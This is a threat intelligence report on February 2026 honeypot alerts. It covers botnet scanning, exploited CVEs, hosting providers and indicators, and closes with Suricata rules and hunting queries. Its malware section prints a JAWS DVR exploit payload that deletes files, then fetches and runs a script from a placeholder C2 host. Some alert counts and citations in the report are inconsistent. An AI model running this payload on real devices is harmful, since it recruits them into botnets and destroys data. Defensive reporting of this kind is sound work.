Suricata IDS catching everything on the wire.

# Suricata IDS Alert Intelligence Report: NadSec Sydney Sensor (February 2026)

**Date:** February 28, 2026
**Security Clearance:** TLP:AMBER
**Author:** Threat Intelligence Team
**Subject:** Comprehensive Analysis of Network Intrusions, IoT Botnet Activity, and Infrastructure Abuse

## 1. Executive Summary

During the observation period of February 2026, the NadSec Sydney T-Pot honeypot infrastructure recorded 159,829 total alerts involving 87 unique source IP addresses. The threat landscape for this period was characterized by a massive volume of automated scanning and exploitation attempts targeting IoT infrastructure, specifically leveraging Mirai and Mozi botnet variants.

**Key Findings:**
*   **Dominant Threat Actor:** A single Autonomous System, **Unmanaged Ltd (AS47890)**, originating from Romania, was responsible for 60.4% of all recorded events (96,625 alerts). This activity is primarily attributed to SIP (Session Initiation Protocol) flooding and scanning, indicating a targeted campaign against VoIP infrastructure [cite: 1, 2].
*   **Infrastructure Abuse:** There is significant evidence of "bulletproof" or high-tolerance hosting abuse. **Layer7 Networks GmbH (AS199912)** in Germany accounted for 25.7% of alerts. Both Unmanaged Ltd and Layer7 have established reputations for hosting scanning infrastructure and ignoring abuse reports [cite: 3, 4].
*   **IoT Botnet Evolution:** The dataset confirms the continued operation of the **Mozi** peer-to-peer botnet. Unique signatures involving ports 7574, 49152, and 5555 were observed, which are distinct indicators of Mozi infection chains [cite: 5]. This activity overlaps with generic Mirai command-and-control (C2) patterns.
*   **Advanced Probing (Ripple20):** A cluster of alerts related to **CVE-2020-11900** (Ripple20/Treck TCP/IP stack) was observed. While often associated with vulnerability research, the persistence of these attempts from Hurricane Electric (US) infrastructure suggests potentially weaponized reconnaissance targeting embedded devices [cite: 6].
*   **Cloud Service Exploitation:** High-reputation cloud providers, specifically **Oracle Cloud (AS31898)**, are being leveraged for scanning campaigns, likely through compromised tenants or fraudulent account creation, to bypass IP reputation filters [cite: 7].

---

## 2. Statistical Overview

The following data represents the aggregated threat metrics for February 2026.

### 2.1 Top Attacking Autonomous Systems (ASNs)
The distribution of alerts is heavily skewed towards two specific providers, indicating centralized infrastructure usage for high-volume scanning.

| Rank | ASN | Organization | Country | Alerts | % of Total | Activity Type |
|:---|:---|:---|:---|:---|:---|:---|
| 1 | **AS47890** | Unmanaged Ltd | Romania | 96,618 | 60.4% | SIP Flooding, VoIP Targeting |
| 2 | **AS199912** | Layer7 Networks GmbH | Germany | 41,130 | 25.7% | Brute Force, Web Exploitation |
| 3 | **AS31898** | Oracle Corporation | Brazil | 20,583 | 12.8% | Cloud Abuse, OAST Scanning |
| 4 | **AS213790** | Limited Network LTD | Iran | 501 | 0.3% | IoT Exploitation |
| 5 | **AS6939** | Hurricane Electric LLC | USA | 482 | 0.3% | Ripple20 Probing (CVE-2020-11900) |

### 2.2 Top Attack Signatures
The signature distribution highlights a focus on IoT recruitment (Mirai/Mozi) and specific stack vulnerabilities.

| Signature Name | Classification | Count (Sampled) | Target |
|:---|:---|:---|:---|
| **ET SCAN Mirai Variant User-Agent** | Botnet Recruitment | 41 | IoT (Generic) |
| **ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free** | Stack Overflow | 26 | Treck TCP/IP |
| **ET SCAN JAWS Webserver Unauthenticated Command Execution** | RCE | 13 | MVPower DVRs |
| **ET EXPLOIT Linksys E-Series Device RCE Attempt** | RCE | 12 | Linksys Routers |
| **GPL VOIP SIP INVITE message flooding** | DoS/Scanning | 1* | VoIP Servers |

*\*Note: While the sampled count is low in the IOC subset, the aggregate stats indicate this signature correlates with the 96,625 events from Unmanaged Ltd.*

### 2.3 Targeted Port Analysis
The port usage confirms the hybrid nature of the attacks, combining web application vectors with specific IoT management ports.

*   **Port 5060 (UDP/TCP):** Targeted by Unmanaged Ltd (SIP Flood).
*   **Port 80/8080:** Targeted by Mirai/JAWS exploits.
*   **Port 7574 & 49152:** Targeted by Mozi Botnet (P2P DHT traffic).
*   **Port 23:** Telnet brute-force (Generic IoT).

---

## 3. Infrastructure Deep Dive

This section analyzes the hosting providers and network characteristics enabling the observed attacks.

### 3.1 Unmanaged Ltd (AS47890) - The "Bulletproof" Facade
**Primary Actor:** 193.46.255.113 (and associated /24 subnet)
**Volume:** ~96,600 Alerts

**Analysis:**
The sheer volume of alerts from AS47890 classifies it as the primary noise generator in this dataset. Research indicates that Unmanaged Ltd is a UK-registered entity (company number 12445167) often associated with "offshore" or "dmzhost" services that explicitly advertise DMCA non-compliance [cite: 4].
*   **Network Behavior:** The alerts correspond to "GPL VOIP SIP INVITE message flooding." This suggests the actor is using high-throughput scanning to identify misconfigured PBX systems for toll fraud or is attempting to exhaust resources (DoS) [cite: 1].
*   **Reputation:** The subnet 193.46.255.0/24 is flagged across multiple threat intelligence feeds as a source of mass-scanning and SIP abuse [cite: 2, 8]. The infrastructure appears to be dedicated to "gray hat" or malicious scanning, shielded by the provider's lax abuse policies [cite: 4].

### 3.2 Layer7 Networks GmbH (AS199912)
**Primary Actor:** 185.55.240.152
**Volume:** ~41,100 Alerts

**Analysis:**
Layer7 Networks is frequently identified in abuse reports related to brute-force attacks and port scanning [cite: 3, 9].
*   **Attack Vector:** The specific IP 185.55.240.152 was observed launching "ET EXPLOIT F5 TMUI RCE (CVE-2020-5902)" and "DrayTek (CVE-2020-8515)" attacks.
*   **Attribution:** The concentration of high-severity RCE attempts from this ASN suggests it is being used to host an "Exploit Kit" or automated vulnerability scanner. The infrastructure is likely leased to threat actors who require high bandwidth and slow takedown response times [cite: 10, 11].

### 3.3 Oracle Cloud Abuse (AS31898)
**Primary Actor:** 204.216.147.144
**Volume:** ~20,500 Alerts

**Analysis:**
The activity from Oracle Cloud IPs represents a trend of "Cloud-native" threat actors.
*   **Behavior:** GreyNoise intelligence links IP 204.216.147.144 to established scanning infrastructure that has been active since late 2024. It is associated with **OAST (Out-of-Band Application Security Testing)** injection campaigns, utilizing payloads that trigger callbacks to measure vulnerability [cite: 7].
*   **Significance:** Utilizing reputable cloud infrastructure allows attackers to bypass standard IP reputation blocklists. The presence of F5 and DrayTek exploits from this IP indicates a compromised tenant or a malicious trial account being used for weaponized scanning.

### 3.4 Residential Proxy & Botnet Nodes
**ASNs:** Chinanet (AS4134), China Unicom (AS4837), National Internet Backbone India (AS9829).
**Analysis:**
A significant portion of the IPs (e.g., 42.53.17.247, 117.196.171.24) belong to residential ISPs. These are not dedicated attack servers but rather **compromised IoT devices** (routers, DVRs, cameras) acting as nodes in a botnet. They are simultaneously victims and perpetrators, scanning for new hosts to infect via Telnet (23) or web ports (80/8080).

---

## 4. Malware Analysis

This section deconstructs the specific malware families identified through signature analysis.

### 4.1 Mozi Botnet (P2P Mirai Variant)
**Indicators:** Ports 7574, 49152, 5555.
**Signatures:** `ET SCAN Mirai Variant User-Agent`, `ET EXPLOIT Linksys E-Series Device RCE`.

**Behavioral Analysis:**
Mozi differs from standard Mirai by utilizing a Peer-to-Peer (P2P) architecture based on Distributed Hash Tables (DHT) [cite: 5, 12].
*   **Port 7574 & 49152:** These ports are specific to Mozi's internal P2P communication for sharing config files and payloads [cite: 5]. The presence of traffic on these ports in the NadSec dataset confirms that the attacking IPs (e.g., 103.38.52.71, 139.5.0.65) are infected nodes participating in the DHT network.
*   **Evolution:** Mozi reuses code from Gafgyt and Mirai but adds resilience against takedowns due to its decentralized nature. It aggressively targets Netgear, Huawei, and ZTE gateways [cite: 13, 14].

### 4.2 Mirai / JAWS Variant
**Indicators:** `ET SCAN JAWS Webserver Unauthenticated Shell Command Execution`.
**Target:** MVPower DVRs.

**Behavioral Analysis:**
The JAWS webserver exploit is a hallmark of Mirai variants targeting surveillance equipment.
*   **Payload:** The attack typically sends a GET request containing shell commands: `/shell?cd+/tmp;rm+-rf+*;wget+http://[C2]/jaws;sh+/tmp/jaws` [cite: 15, 16].
*   **Convergence:** This exploit is often bundled with other "n-day" vulnerabilities (like the Linksys E-Series RCE observed in the data) into a single binary, allowing the botnet to infect a diverse range of hardware [cite: 16].

### 4.3 Ripple20 (Treck TCP/IP Stack)
**Indicators:** `ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free`.
**Source:** Hurricane Electric IPs (e.g., 65.49.1.146).

**Behavioral Analysis:**
This signature detects malformed packets targeting the Treck TCP/IP stack, widely used in industrial and medical IoT devices [cite: 6].
*   **Technique:** The attack involves sending a specific IP-in-IP packet that triggers a double-free memory error, leading to RCE or DoS [cite: 17].
*   **Context:** The sourcing of these attacks from Hurricane Electric (a major backbone provider often used by security researchers) could indicate legitimate scanning. However, the sheer persistence and categorization as "Attempted Administrator Privilege Gain" warrants treating it as hostile probing.

---

## 5. Campaign Analysis

Based on the temporal and infrastructure patterns, three distinct campaigns are active.

### Campaign A: "The VoIP Sweepers"
*   **Actor:** Unmanaged Ltd (AS47890).
*   **Objective:** Identification of open SIP proxies for toll fraud.
*   **Methodology:** High-volume SIP INVITE flooding.
*   **Status:** Active, high noise. This is likely an automated, financially motivated campaign that ignores target responses, simply logging successful handshakes.

### Campaign B: "The P2P Swarm" (Mozi)
*   **Actor:** Decentralized Botnet (Infected Residential/Telco IPs).
*   **Objective:** Botnet expansion and DDoS capacity building.
*   **Methodology:** Scanning for ports 23/80/8080 and specific IoT vulnerabilities (JAWS, Linksys, Huawei). Once infected, the device opens ports 7574/49152 to join the DHT [cite: 5].
*   **Status:** Endemic. The presence of IPs from India (National Internet Backbone), China (China Unicom), and Pakistan (Cyber Internet Services) confirms the global spread.

### Campaign C: "The Cloud Cannons"
*   **Actor:** Unknown (leveraging Oracle/Layer7).
*   **Objective:** Enterprise Vulnerability Exploitation.
*   **Methodology:** Using high-bandwidth cloud servers to launch complex web exploits (F5 Big-IP, DrayTek). Unlike the "spray and pray" IoT attacks, these signatures (CVE-2020-5902) target enterprise-grade networking equipment.
*   **Status:** Targeted. The use of specific CVEs against high-value targets suggests a more sophisticated operator than the IoT botherders.

---

## 6. MITRE ATT&CK Mapping

The observed activities map to the following MITRE ATT&CK Enterprise Matrix techniques:

| T-Code | Technique | Observed Evidence |
|:---|:---|:---|
| **T1595.002** | Active Scanning: Vulnerability Scanning | Massive scanning for CVE-2020-5902 (F5) and CVE-2020-11900 (Ripple20). |
| **T1190** | Exploit Public-Facing Application | Successful triggering of JAWS RCE and Linksys RCE signatures. |
| **T1046** | Network Service Discovery | Port scanning on 7574, 49152, 5060. |
| **T1583.006** | Acquire Infrastructure: Web Services | Use of Oracle Cloud and Layer7 Networks for attack infrastructure. |
| **T1584.005** | Compromise Infrastructure: Botnet | Utilization of residential IoT devices (Mozi/Mirai) as attack proxies. |
| **T1071.001** | Application Layer Protocol: Web Protocols | C2 communication via HTTP (JAWS wget commands). |
| **T1095** | Non-Application Layer Protocol | Use of P2P (DHT) protocols on UDP ports 7574/49152 for Mozi C2. |

---

## 7. Detection & Mitigation Strategies

### 7.1 Firewall & ACL Recommendations
Immediate blocking of the following ASNs and ports is recommended if no legitimate business need exists:
1.  **Block AS47890 (Unmanaged Ltd):** High confidence of malicious SIP traffic.
2.  **Block AS199912 (Layer7 Networks):** Source of high-severity exploit traffic.
3.  **Port Block (Ingress/Egress):**
    *   **UDP/TCP 7574 & 49152:** Strictly block. These are specific to Mozi botnet P2P traffic [cite: 5].
    *   **TCP 5555:** Block (ADB interface often exploited by Mirai).
    *   **UDP 5060:** Restrict SIP traffic to known VoIP providers only.

### 7.2 Suricata/Snort Signature Tuning
Ensure the following rules are enabled and set to DROP:
```bash
# Mozi/Mirai Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"ET SCAN Mirai Variant User-Agent"; content:"Mirai"; http_user_agent; classtype:trojan-activity; sid:2029022;)
alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"ET SCAN JAWS Webserver Unauthenticated Shell Command Execution"; content:"/shell?"; http_uri; classtype:web-application-attack; sid:2027865;)

# Ripple20 Detection
alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free"; ip_proto:4; classtype:attempted-admin; sid:2030388;)
```

### 7.3 Threat Hunting Queries (SIEM)
**Splunk/ELK Query for Mozi Activity:**
```sql
(dest_port=7574 OR dest_port=49152) AND (transport=UDP) AND (direction=inbound)
```
**Query for Ripple20 Probing:**
```sql
signature="*CVE-2020-11900*" OR (proto="IP-in-IP" AND src_asn="AS6939")
```

---

## 8. IOC Appendix (Top Offenders)

| IP Address | Country | ASN | Categories | Associated Malware/Campaign |
|:---|:---|:---|:---|:---|
| **193.46.255.113** | RO | AS47890 | DoS, Scanning | SIP Flood (Unmanaged Ltd) |
| **185.55.240.152** | DE | AS199912 | Exploit | F5/DrayTek RCE (Layer7) |
| **204.216.147.144** | BR | AS31898 | Exploit | OAST/Cloud Abuse (Oracle) |
| **65.49.1.146** | US | AS6939 | Exploit | Ripple20 (Hurricane Electric) |
| **42.53.17.247** | CN | AS4837 | Web Attack | Mirai/JAWS (China Unicom) |
| **112.196.109.146** | IN | AS17917 | Exploit | CVE-2020-11910 (Quadrant Televentures) |
| **103.38.52.71** | IN | AS135761 | Botnet | Mozi P2P Node (Userlinks Netcom) |

---

## 9. Sources & Citations

*   [cite: 1] IPInfo.io, "193.46.255.0/24 IP Range Details".
*   [cite: 15] AbuseIPDB, "User Profile: Auto Reporter (JAWS Webserver Reports)".
*   [cite: 7] GreyNoise, "Weekly OAST Report - Feb 13, 2026".
*   [cite: 8] IPRegistry, "AS47890 Unmanaged Ltd Details".
*   [cite: 2] BGP.he.net, "AS47890 Unmanaged Ltd Network Info".
*   [cite: 3] AbuseIPDB, "IP Abuse Reports for 62.164.177.253 (Layer7)".
*   [cite: 16] Palo Alto Networks Unit 42, "New Mirai/Gafgyt IoT/Linux Botnet Campaigns".
*   [cite: 5] CERT-In, "Mozi IoT Botnet Alert (Nov 2020)".
*   [cite: 13] Lumen (Black Lotus Labs), "New Mozi Malware Family Quietly Amasses IoT Bots".
*   [cite: 6] Emerging Threats, "Suricata Exploit Rules (Ripple20)".
*   [cite: 17] AwanPintar, "Digital Threat Report 2024 (IP-in-IP Double Free)".
*   [cite: 4] Team Cymru, "Jingle Shells: How Virtual Offices Enable Legitimacy".
*   [cite: 5] CERT-In, "Mozi Botnet Countermeasures (Ports 7574/49152)".
*   [cite: 14] IBM X-Force, "Botnet Attack: Mozi Mozied into Town".
*   [cite: 12] Microsoft Security, "Defending Against Mozi IoT Botnet".
*   [cite: 6] Emerging Threats, "Signature 2030388: Possible CVE-2020-11900".

**Sources:**
1. [ipinfo.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQE_gun8xoNoPZOHs4DfhOo0xXFDkXk6WlHvajfvmmReY8MUZcoK6RLRExRbHmCU58fKt8dRZMZUz2F6An2nvBhR2G_-WHD-45_Nd6C6yofSllQYi4gIolbjW7_w)
2. [he.net](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHuCUTv1q4r10w8Nedq0Td9uiVqKT5eWzICmH6A_R-3kKz1na78QzjkQHQmvId_1KWxAQ4blWFEVDWW4Su6y6GnvpR9nRjd9dhruVKmzXRBwznSGW5JU67yiYtHKQ==)
3. [abuseipdb.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEaFcnOv28Nfw8QrVI88HknezNfkjqxG1SoctZfiVQDiylX3xEEB-2kywbH5AMs1-md7rlWTmTQ3yM4Sjjq7dAI35gqTwYT4hIP0ThfB6Ms-VeK5AED2qx0OFeYUZ37qvh9RKPV)
4. [team-cymru.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHZzOLP-Rfe4MlIIcnIIWy4gH_ARKZYkY-zbfHr8DEX4q7dEQDANOVOgX5A_rJXRFZT--I1lzoNg9_P96FHOIgyiLjSXKqE53qRa86HyDjt7_DKsNyuYz04Z1L3KslNQ_M22oBW1VqgVAWF-mv2BfCYfGHeuEWS8Vg0gyg68RtVl0PBZcGgtuL-xJszdXMgUDmuY3c46w==)
5. [csk.gov.in](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHO82XkhPolm5Lir6YnuQRKMvG9gl0iW_mXOKySGlNv0NnghGa_-OEm9p7myhoOjGSyDCL4Mu1PSdbmAXEVRPTzo5arzO9YQStIT8jyO07f2_0Fn6pQu2iLA2FYCv2t6Z2UhxuCNQU=)
6. [github.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGM0IU5IKbV17X7XzILxmBZ0QgF6RGsdrMNuozMx0kMRyNQgTD3Fdg7iQZf-am24P2pXBDto5ZvQ_BYQVhUl1_ls7GXDbCit0MA8FU0C1rm15TakdekpIVUl7hPnQbhZ0KrFAYuRqyxsQMCsR3Ids1XNmek-Tyf8xAEYR53aBJLdwXH5Q==)
7. [greynoise.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEzmYm6FWIuXtiPZtEFwAc9TRiiaQ35U-v_oZ9jHhdYu5iodDNodpAw6zusNEC2lsuSw9WnWeLwi1WxGCLppCmjl_pcriJt6oSZ1ie5JSCxPSPwFdqq4HJahXJTYkswMHsWcVbhaiYQFn5_tPhqMq-oIP9rWcrthfcvEq0=)
8. [ipregistry.co](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQG1ELdev_UPVQJ0CjhpbW-tQ3Nb2dAuA7T4tAh5Zv9r-q3VKQ0oKIf1iVVqHtpWa7LpDJe8HGBbD0Spwk-d1bIp1mZgYYvJIEqb0zUzEovadkDrFhgFtm2YxQ-4Ljb37nqFG28=)
9. [abuseipdb.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFZwH7CUsEtAOScEjx-vV6cO6GbVXUm3HIQDN5L226CH_hA_zuE7Wh7D3aVbX8QFt9JiyR4rnpii7YYn9pBakX1uJb9scKQnmaP0hk_sIctCiwW0FmJNZOmZwB4jYEhMa0eVh3yjEiBQDNSrVo=)
10. [cesnet.cz](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEwIYCaNIBKwR5_4WF0zrYrB2me3Qlz8JLBzk9FM9kbSWnNsM5EG9K6z6TJ8tfvxr5BHZIutlfPLRbeb1Ct1_VVtHO1VLFXp8LyIM0BlNcNi0B-6I3U-H82_58xi3qH_EyWm1NNDUz2zw==)
11. [ipinfo.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFxqvke9RZ-yxMb_EQidJASZPsTmwn4QI_Cm8PS6-ZWTN3TuSwbZ10RyLKomwNNyH_h2-e5n3QZkdzspQQBUoxqgGMALrIV6WQk-lyyLaCw9A==)
12. [microsoft.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHVezYgRY5XSmPPBf1OeTiqB9ovTiP66ySl1etorioDl76imU3oy1JckysuiN7KtpCa7XoINr3guY_14AntdUlrfgfgHHFemt3gMFwzp-pgxsFrqtBbq4hAgREUC6xXw4ypZh5PTTJq5XL1KMSMrd_78V_qs6iypF0b2wxRO20x1JRFa1GK8ftNz4ZjCvxovkVuj-9rJWJzI4_zFcY4TcJyuw==)
13. [lumen.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHyFf7D3T3vooSO_6utxzSBoPGJKsqFxvsW23fDOzJ21bc4CyILxCDNSluuk8j_BSoE69vvfDpZhH9UMpcGpHGss8ADjRO4WFs6zoq8KYsYsuq-yg8-R7cQa_mhpKq4k2NjQ_PlRNK7oLiCpUu7dDohtnrIOeNG8xZf7Q_4tWk=)
14. [ibm.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQERuG_qo8gmBB2GEcoEkexZGs_2S6byF4yJ0cRQRAIF4WBEtE8ESfS_LzE1XdmSLKaSLqCQI2SAsR0jdoIh7Qif62FSAwjFhimyn3zL3aNY6q8b5rzwMERsqCC0u3QSMvskj4JpVPZVXDG1PHDHbrTAIGDIwb5kQU91_Tc=)
15. [abuseipdb.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGfFEHKSzSnbstUCnrhj1eF84DqMIL4E7FJx6PP8Ju_DqpHRvvz-LjyngHSWMRX7Mm416UPwb-LTZSwBg7oKRTwRqmXCAGjJQn2rMDzMP04X2glAoAssV8Q3dp5QU1wfnWY)
16. [paloaltonetworks.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEXjJ5bmg5XBQycGwUvtEXR1cFG_MfXjjU6mjeRfEmEJxXOKA1XoZ2w0MNeox7XSOMGMmpISD43GIINPtZ-7txaXCpPiGYBaJbpl_yNRFujRE6RTjnpKTaG96mYpdUWJgdjrTPQaddnn_2LMvDGu7-dN_vkDD2HIHpD0buSok5ozbvld5o6kjlu3IPaDJCH-WcKFw==)
17. [awanpintar.id](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEZkLsOnX4pRIFyeFXrHnmMYefT5F9Z_ZnZpJCbQgn9FwZe2KECjQPQGE7pL4_ITEJmw5qdlrZ19mlVQUUCmdhfsVUfLK-zuj8SaStwY355-NcRisqUFyqNPE28nm7tx6VKItNb4fquQ0HehPmwjs57SS711_Jx_1iV7_Ttqzfe1PMyRfhhaKVFnnuaHPxnXYScrB3UbDIVANZOpYbCM_UXDdnIDaLhpA==)